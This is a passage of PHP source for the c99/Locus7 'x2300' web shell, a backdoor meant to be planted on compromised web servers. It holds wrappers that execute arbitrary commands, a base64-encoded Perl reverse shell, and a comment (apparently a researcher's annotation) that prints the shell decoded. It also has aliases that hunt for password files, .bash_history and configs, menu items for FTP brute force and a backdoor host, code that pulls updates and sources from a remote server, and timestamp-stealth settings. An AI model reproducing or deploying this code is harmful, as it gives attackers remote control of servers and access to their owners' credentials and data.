  270. function which($pr)
  271. {
  272. $path = ex("which $pr");
  273. if(!empty($path)) { return $path; } else { return $pr; }
  274. }
  275. function ex($cfe)
  276. {
  277. $res = '';
  278. if (!empty($cfe))
  279. {
  280. if(function_exists('exec'))
  281. {
  282. @exec($cfe,$res);
  283. $res = join("\n",$res);
  284. }
  285. elseif(function_exists('shell_exec'))
  286. {
  287. $res = @shell_exec($cfe);
  288. }
  289. elseif(function_exists('system'))
  290. {
  291. @ob_start();
  292. @system($cfe);
  293. $res = @ob_get_contents();
  294. @ob_end_clean();
  295. }
  296. elseif(function_exists('passthru'))
  297. {
  298. @ob_start();
  299. @passthru($cfe);
  300. $res = @ob_get_contents();
  301. @ob_end_clean();
  302. }
  303. elseif(@is_resource($f = @popen($cfe,"r")))
  304. {
  305. $res = "";
  306. while(!@feof($f)) { $res .= @fread($f,1024); }
  307. @pclose($f);
  308. }
  309. }
  310. return $res;
  311. }
  312. //EoW
  313.  
  314.  
  315.  
  316.  
  317.  
  318.  
  319.  
  320.  
  321.  
  322.  
  323.  
  324.  
  325.  
  326.  
  327.  
  328.  
  329. //Start Enumerate function
  330. //function ENUMERATE()
  331.  
  332. $hostname_x=php_uname(n);
  333. $itshome = getcwd();
  334. $itshome = str_replace("/home/","~",$itshome);
  335. $itshome = str_replace("/public_html","/x2300.php",$itshome);
  336. $enumerate = "http://".$hostname_x."/".$itshome."";
  337.  
  338. //End Enumerate function
  339.  
  340. //Starting calls
  341. ini_set("max_execution_time",0);
  342. if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
  343. error_reporting(5);
  344. $adires="";
  345. @ignore_user_abort(TRUE);
  346. @set_magic_quotes_runtime(0);
  347. $win = strtolower(substr(PHP_OS,0,3)) == "win";
  348. define("starttime",getmicrotime());
  349. if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
  350. $_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
  351. foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
  352.  
  353. $shver = "1.0a beta"; //Current version
  354. //CONFIGURATION AND SETTINGS
  355. if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
  356. elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
  357. else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL
  358. }
  359.  
  360. $surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
  361.  
  362. if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
  363. if (empty($surl))
  364. {
  365. $surl = "?".$includestr; //Self url
  366. }
  367. $surl = htmlspecialchars($surl);
  368.  
  369. $timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
  370.  
  371. //Authentication
  372. $login = ""; //login
  373. //DON'T FORGOT ABOUT PASSWORD!!!
  374. $pass = ""; //password
  375. $md5_pass = ""; //md5-cryped pass. if null, md5($pass)
  376.  
  377. $host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
  378. $login_txt = "Restricted area"; //http-auth message.
  379. $accessdeniedmess = "<a href=\"http://locus7s.com\">x2300 Locus7Shell v.".$shver."</a>: access denied";
  380.  
  381. $gzipencode = TRUE; //Encode with gzip?
  382.  
  383. $updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)
  384.  
  385. $c99sh_updateurl = "http://locus7s.com/files/lshell_update/"; //Update server
  386. $c99sh_sourcesurl = "http://locus7s.com/"; //Sources-server
  387.  
  388. $filestealth = TRUE; //if TRUE, don't change modify- and access-time
  389.  
  390. $donated_html = "<center><b>Hacked by Tox[II]c BoX </b></center>";
  391. /* If you publish free shell and you wish
  392. add link to your site or any other information,
  393. put here your html. */
  394. $donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
  395.  
  396. $curdir = "./"; //start folder
  397. //$curdir = getenv("DOCUMENT_ROOT");
  398. $tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
  399. $tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
  400.  
  401. $log_email = "user@host.tld"; //Default e-mail for sending logs
  402.  
  403. $sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
  404. $sort_save = TRUE; //If TRUE then save sorting-position using cookies.
  405.  
  406. // Registered file-types.
  407. // array(
  408. // "{action1}"=>array("ext1","ext2","ext3",...),
  409. // "{action2}"=>array("ext4","ext5","ext6",...),
  410. // ...
  411. // )
  412. $ftypes = array(
  413. "html"=>array("html","htm","shtml"),
  414. "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
  415. "exe"=>array("sh","install","bat","cmd"),
  416. "ini"=>array("ini","inf"),
  417. "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
  418. "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
  419. "sdb"=>array("sdb"),
  420. "phpsess"=>array("sess"),
  421. "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
  422. );
  423.  
  424. // Registered executable file-types.
  425. // array(
  426. // string "command{i}"=>array("ext1","ext2","ext3",...),
  427. // ...
  428. // )
  429. // {command}: %f% = filename
  430. $dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin);
  431. if (empty($dizin)) {$dizin = realpath(".");} elseif(realpath($dizin)) {$dizin = realpath($dizin);}
  432. $dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin);
  433. if (substr($dizin,-1) != DIRECTORY_SEPARATOR) {$dizin .= DIRECTORY_SEPARATOR;}
  434. $dizin = str_replace("\\\\","\\",$dizin);
  435. $dizinispd = htmlspecialchars($dizin);
  436. /*dizin*/
  437. $real = realpath($dizinispd);
  438. $path = basename ($PHP_SELF);
  439. function dosyayicek($link,$file)
  440. {
  441. $fp = @fopen($link,"r");
  442. while(!feof($fp))
  443. {
  444. $cont.= fread($fp,1024);
  445. }
  446. fclose($fp);
  447.  
  448. $fp2 = @fopen($file,"w");
  449. fwrite($fp2,$cont);
  450. fclose($fp2);
  451. }
  452.  
  453.  
  454.  
  455.  
  456. $exeftypes = array(
  457. getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
  458. "perl %f%" => array("pl","cgi")
  459. );
  460.  
  461. /* Highlighted files.
  462. array(
  463. i=>array({regexp},{type},{opentag},{closetag},{break})
  464. ...
  465. )
  466. string {regexp} - regular exp.
  467. int {type}:
  468. 0 - files and folders (as default),
  469. 1 - files only, 2 - folders only
  470. string {opentag} - open html-tag, e.g. "<b>" (default)
  471. string {closetag} - close html-tag, e.g. "</b>" (default)
  472. bool {break} - if TRUE and found match then break
  473. */
  474. $regxp_highlight = array(
  475. array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
  476. array("config.php",1) // example
  477. );
  478.  
  479. $safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
  480. // array (i=>{letter} ...); string {letter} - letter of a drive
  481. //$safemode_diskettes = range("a","z");
  482. $hexdump_lines = 8;// lines in hex preview file
  483. $hexdump_rows = 24;// 16, 24 or 32 bytes in one line
  484.  
  485. $nixpwdperpage = 100; // Get first N lines from /etc/passwd
  486.  
  487. $bindport_pass = "c99"; // default password for binding
  488. $bindport_port = "31373"; // default port for binding
  489. $bc_port = "31373"; // default port for back-connect
  490. $datapipe_localport = "8081"; // default port for datapipe
  491. $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
  492. aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
  493. hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
  494. sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
  495. kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
  496. KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
  497. OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
  498.  
  499. /* ===================DECODED BY MALWAREMUSTDIE=============
  500.  
  501. #!/usr/bin/perl
  502. use Socket;
  503. $cmd= "lynx";
  504. $system= 'echo "`uname -a`";echo "`id`";/bin/sh';
  505. $0=$cmd;
  506. $target=$ARGV[0];
  507. $port=$ARGV[1];
  508. $iaddr=inet_aton($target) || die("Error: $!\n");
  509. $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
  510. $proto=getprotobyname('tcp');
  511. socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
  512. connect(SOCKET, $paddr) || die("Error: $!\n");
  513. open(STDIN, ">&SOCKET");
  514. open(STDOUT, ">&SOCKET");
  515. open(STDERR, ">&SOCKET");
  516. system($system);
  517. close(STDIN);
  518. close(STDOUT);
  519. close(STDERR);
  520.  
  521. ======================END OF DECODER ============= */
  522.  
  523. // Command-aliases
  524. if (!$win)
  525. {
  526. $cmdaliases = array(
  527. array("-----------------------------------------------------------", "ls -la"),
  528. array("find all suid files", "find / -type f -perm -04000 -ls"),
  529. array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
  530. array("find all sgid files", "find / -type f -perm -02000 -ls"),
  531. array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
  532. array("find config.inc.php files", "find / -type f -name config.inc.php"),
  533. array("find config* files", "find / -type f -name \"config*\""),
  534. array("find config* files in current dir", "find . -type f -name \"config*\""),
  535. array("find all writable folders and files", "find / -perm -2 -ls"),
  536. array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
  537. array("find all service.pwd files", "find / -type f -name service.pwd"),
  538. array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
  539. array("find all .htpasswd files", "find / -type f -name .htpasswd"),
  540. array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
  541. array("find all .bash_history files", "find / -type f -name .bash_history"),
  542. array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
  543. array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
  544. array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
  545. array("list file attributes on a Linux second extended file system", "lsattr -va"),
  546. array("show opened ports", "netstat -an | grep -i listen")
  547. );
  548. }
  549. else
  550. {
  551. $cmdaliases = array(
  552. array("-----------------------------------------------------------", "dir"),
  553. array("show opened ports", "netstat -an")
  554. );
  555. }
  556.  
  557. $sess_cookie = "c99shvars"; // Cookie-variable name
  558.  
  559. $usefsbuff = TRUE; //Buffer-function
  560. $copy_unset = FALSE; //Remove copied files from buffer after pasting
  561.  
  562. //Quick launch
  563. $quicklaunch = array(
  564. array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl),
  565. array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"),
  566. array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"),
  567. array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
  568. array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""),
  569. array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"),
  570. array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"),
  571. array("<br><center><b>[Enumerate]</b>",$enumerate),
  572. array("<b>[Encoder]</b>",$surl."act=encoder&d=%d"),
  573. array("<b>[Tools]</b>",$surl."act=tools&d=%d"),
  574. array("<b>[Proc.]</b>",$surl."act=processes&d=%d"),
  575. array("<b>[FTP Brute]</b>",$surl."act=ftpquickbrute&d=%d"),
  576. array("<b>[Sec.]</b>",$surl."act=security&d=%d"),
  577. array("<b>[SQL]</b>",$surl."act=sql&d=%d"),
  578. array("<b>[PHP-Code]</b>",$surl."act=eval&d=%d"),
  579. array("<b>[Backdoor Host]</b>",$surl."act=shbd"),
  580. array("<b>[Back-Connection]</b>",$surl."act=backc"),
  581. array("<b>[milw0rm it!]</b>",$millink),
  582. array("<b>[PHP-Proxy]</b>",$phprox),
  583. array("<b>[Self remove]</b></center>",$surl."act=selfremove")
  584. );
  585.  
  586. //Highlight-code colors
  587. $highlight_background = "#c0c0c0";
  588. $highlight_bg = "#FFFFFF";
  589. $highlight_comment = "#6A6A6A";
  590. $highlight_default = "#0000BB";
  591. $highlight_html = "#1300FF";
  592. $highlight_keyword = "#007700";
  593. $highlight_string = "#000000";
  594.  
  595. @$f = $_REQUEST["f"];
  596. @extract($_REQUEST["c99shcook"]);
  597.  
  598. //END CONFIGURATION
  599.  
  600.  
  601. // \/Next code isn't for editing\/
  602. /*function ex($cfe)
  603. {
  604. $res = '';
  605. if (!empty($cfe))
  606. {
  607. if(function_exists('exec'))
  608. {
  609. @exec($cfe,$res);
  610. $res = join("\n",$res);
  611. }
  612. elseif(function_exists('shell_exec'))
  613. {
  614. $res = @shell_exec($cfe);
  615. }
  616. elseif(function_exists('system'))
  617. {
  618. @ob_start();
  619. @system($cfe);
  620. $res = @ob_get_contents();
  621. @ob_end_clean();
  622. }
  623. elseif(function_exists('passthru'))
  624. {
  625. @ob_start();
  626. @passthru($cfe);
  627. $res = @ob_get_contents();
  628. @ob_end_clean();
  629. }
  630. elseif(@is_resource($f = @popen($cfe,"r")))
  631. {
  632. $res = "";
  633. while(!@feof($f)) { $res .= @fread($f,1024); }
  634. @pclose($f);
  635. }
  636. }
  637. return $res;
  638. }*/
  639. /*function which($pr)
  640. {
  641. $path = ex("which $pr");
  642. if(!empty($path)) { return $path; } else { return $pr; }
  643. }
  644.  
  645. function cf($fname,$text)
  646. {
  647. $w_file=@fopen($fname,"w") or err(0);
  648. if($w_file)
  649. {
  650. @fputs($w_file,@base64_decode($text));
  651. @fclose($w_file);
  652. }
  653. }*/
  654. /*function err($n,$txt='')
  655. {
  656. echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#000000><font color=red face=Verdana size=-2><div align=center><b>';
  657. echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
  658. if(!empty($txt)) { echo " $txt"; }
  659. echo '</b></div></font></td></tr></table>';
  660. return null;
  661. }*/
  662. @set_time_limit(0);
  663. $tmp = array();
  664. foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
  665. $s = "!^(".implode("|",$tmp).")$!i";
  666. if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://locus7s.com/\">x2300 Shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
  667. if (!empty($login))
  668. {
  669. if (empty($md5_pass)) {$md5_pass = md5($pass);}
  670. if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
  671. {
  672. if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
  673. header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\"");
  674. header("HTTP/1.0 401 Unauthorized");
  675. exit($accessdeniedmess);
  676. }
  677. }
  678. if ($act != "img")
  679. {
  680. $lastdir = realpath(".");
  681. chdir($curdir);
  682. if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;}
  683. $sess_data = unserialize($_COOKIE["$sess_cookie"]);
  684. if (!is_array($sess_data)) {$sess_data = array();}
  685. if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
  686. if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
  687.  
  688. $disablefunc = @ini_get("disable_functions");
  689. if (!empty($disablefunc))
  690. {
  691. $disablefunc = str_replace(" ","",$disablefunc);
  692. $disablefunc = explode(",",$disablefunc);
  693. }
  694.  
  695. if (!function_exists("c99_buff_prepare"))
  696. {
  697. function c99_buff_prepare()
  698. {
  699. global $sess_data;
  700. global $act;
  701. foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
  702. foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
  703. $sess_data["copy"] = array_unique($sess_data["copy"]);
  704. $sess_data["cut"] = array_unique($sess_data["cut"]);
  705. sort($sess_data["copy"]);
  706. sort($sess_data["cut"]);
  707. if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
  708. else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
  709. }
  710. }
  711. c99_buff_prepare();
  712.  
  713. if (!function_exists("c99_sess_put"))
  714. {
  715. function c99_sess_put($data)
  716. {
  717. global $sess_cookie;
  718. global $sess_data;
  719. c99_buff_prepare();
  720. $sess_data = $data;
  721. $data = serialize($data);
  722. setcookie($sess_cookie,$data);
  723. }
  724. }
  725. foreach (array("sort","sql_sort") as $v)
  726. {
  727. if (!empty($_GET[$v])) {$$v = $_GET[$v];}
  728. if (!empty($_POST[$v])) {$$v = $_POST[$v];}
  729. }
  730. if ($sort_save)
  731. {
  732. if (!empty($sort)) {setcookie("sort",$sort);}
  733. if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
  734. }
  735. if (!function_exists("str2mini"))
  736. {
  737. function str2mini($content,$len)
  738. {
  739. if (strlen($content) > $len)
  740. {
  741. $len = ceil($len/2) - 2;
  742. return substr($content, 0,$len)."...".substr($content,-$len);
  743. }
  744. else {return $content;}
  745. }
  746. }
  747. if (!function_exists("view_size"))
  748. {
  749. function view_size($size)
  750. {
  751. if (!is_numeric($size)) {return FALSE;}
  752. else
  753. {
  754. if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
  755. elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
  756. elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
  757. else {$size = $size . " B";}
  758. return $size;
  759. }
  760. }
  761. }
  762. if (!function_exists("fs_copy_dir"))
  763. {
  764. function fs_copy_dir($d,$t)
  765. {
  766. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  767. if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  768. $h = opendir($d);
  769. while (($o = readdir($h)) !== FALSE)
  770. {
  771. if (($o != ".") and ($o != ".."))
  772. {
  773. if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  774. else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  775. if (!$ret) {return $ret;}
  776. }
  777. }
  778. closedir($h);
  779. return TRUE;
  780. }
  781. }
  782. if (!function_exists("fs_copy_obj"))
  783. {
  784. function fs_copy_obj($d,$t)
  785. {
  786. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  787. $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
  788. if (!is_dir(dirname($t))) {mkdir(dirname($t));}
  789. if (is_dir($d))
  790. {
  791. if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  792. if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  793. return fs_copy_dir($d,$t);
  794. }
  795. elseif (is_file($d)) {return copy($d,$t);}
  796. else {return FALSE;}
  797. }
  798. }
  799. if (!function_exists("fs_move_dir"))
  800. {
  801. function fs_move_dir($d,$t)
  802. {
  803. $h = opendir($d);
  804. if (!is_dir($t)) {mkdir($t);}
  805. while (($o = readdir($h)) !== FALSE)
  806. {
  807. if (($o != ".") and ($o != ".."))
  808. {
  809. $ret = TRUE;
  810. if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  811. else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
  812. if (!$ret) {return $ret;}
  813. }
  814. }
  815. closedir($h);
  816. return TRUE;
  817. }
  818. }
  819. if (!function_exists("fs_move_obj"))
  820. {
  821. function fs_move_obj($d,$t)
  822. {
  823. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  824. $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
  825. if (is_dir($d))
  826. {
  827. if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  828. if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  829. return fs_move_dir($d,$t);
  830. }
  831. elseif (is_file($d))
  832. {
  833. if(copy($d,$t)) {return unlink($d);}
  834. else {unlink($t); return FALSE;}
  835. }
  836. else {return FALSE;}
  837. }
  838. }
  839. if (!function_exists("fs_rmdir"))
  840. {
  841. function fs_rmdir($d)
  842. {
  843. $h = opendir($d);
  844. while (($o = readdir($h)) !== FALSE)
  845. {
  846. if (($o != ".") and ($o != ".."))
  847. {
  848. if (!is_dir($d.$o)) {unlink($d.$o);}
  849. else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
  850. }
  851. }
  852. closedir($h);
  853. rmdir($d);
  854. return !is_dir($d);
  855. }
  856. }
  857. if (!function_exists("fs_rmobj"))
  858. {
  859. function fs_rmobj($o)
  860. {
  861. $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
  862. if (is_dir($o))
  863. {
  864. if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
  865. return fs_rmdir($o);
  866. }
  867. elseif (is_file($o)) {return unlink($o);}
  868. else {return FALSE;}
  869. }
  870. }
  871. if (!function_exists("myshellexec"))
  872. {
  873. function myshellexec($cmd)
  874. {
  875. global $disablefunc;
  876. $result = "";
  877. if (!empty($cmd))
  878. {
  879. if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  880. elseif (($result = `$cmd`) !== FALSE) {}
  881. elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  882. elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  883. elseif (is_resource($fp = popen($cmd,"r")))
  884. {
  885. $result = "";
  886. while(!feof($fp)) {$result .= fread($fp,1024);}
  887. pclose($fp);
  888. }
  889. }
  890. return $result;
  891. }
  892. }
  893. if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
  894. if (!function_exists("view_perms"))
  895. {
  896. function view_perms($mode)
  897. {
  898. if (($mode & 0xC000) === 0xC000) {$type = "s";}
  899. elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
  900. elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
  901. elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
  902. elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
  903. elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
  904. elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
  905. else {$type = "?";}
  906.  
  907. $owner["read"] = ($mode & 00400)?"r":"-";
  908. $owner["write"] = ($mode & 00200)?"w":"-";
  909. $owner["execute"] = ($mode & 00100)?"x":"-";
  910. $group["read"] = ($mode & 00040)?"r":"-";
  911. $group["write"] = ($mode & 00020)?"w":"-";
  912. $group["execute"] = ($mode & 00010)?"x":"-";
  913. $world["read"] = ($mode & 00004)?"r":"-";
  914. $world["write"] = ($mode & 00002)? "w":"-";
  915. $world["execute"] = ($mode & 00001)?"x":"-";
  916.  
  917. if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
  918. if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
  919. if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
  920.  
  921. return $type.join("",$owner).join("",$group).join("",$world);
  922. }
  923. }
  924. if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
  925. if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
  926. if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
  927. if (!function_exists("parse_perms"))
  928. {
  929. function parse_perms($mode)
  930. {
  931. if (($mode & 0xC000) === 0xC000) {$t = "s";}
  932. elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
  933. elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
  934. elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
  935. elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
  936. elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
  937. elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
  938. else {$t = "?";}
  939. $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
  940. $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
  941. $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
  942. return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
  943. }
  944. }
  945. if (!function_exists("parsesort"))
  946. {
  947. function parsesort($sort)
  948. {
  949. $one = intval($sort);
  950. $second = substr($sort,-1);
  951. if ($second != "d") {$second = "a";}
  952. return array($one,$second);
  953. }
  954. }
  955. if (!function_exists("view_perms_color"))
  956. {
  957. function view_perms_color($o)
  958. {
  959. if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
  960. elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
  961. else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
  962. }
  963. }
  964. if (!function_exists("c99getsource"))
  965. {
  966. function c99getsource($fn)
  967. {
  968. global $c99sh_sourcesurl;
  969. $array = array(
  970. "c99sh_bindport.pl" => "c99sh_bindport_pl.txt",
  971. "c99sh_bindport.c" => "c99sh_bindport_c.txt",
  972. "c99sh_backconn.pl" => "c99sh_backconn_pl.txt",
  973. "c99sh_backconn.c" => "c99sh_backconn_c.txt",
  974. "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt",
  975. "c99sh_datapipe.c" => "c99sh_datapipe_c.txt",
  976. );
  977. $name = $array[$fn];
  978. if ($name) {return file_get_contents($c99sh_sourcesurl.$name);}
  979. else {return FALSE;}
  980. }
  981. }
  982. if (!function_exists("c99sh_getupdate"))
  983. {
  984. function c99sh_getupdate($update = TRUE)
  985. {
  986. $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&";
  987. $data = @file_get_contents($url);
  988. if (!$data) {return "Can't connect to update-server!";}
  989. else
  990. {
  991. $data = ltrim($data);
  992. $string = substr($data,3,ord($data{2}));
  993. if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;}
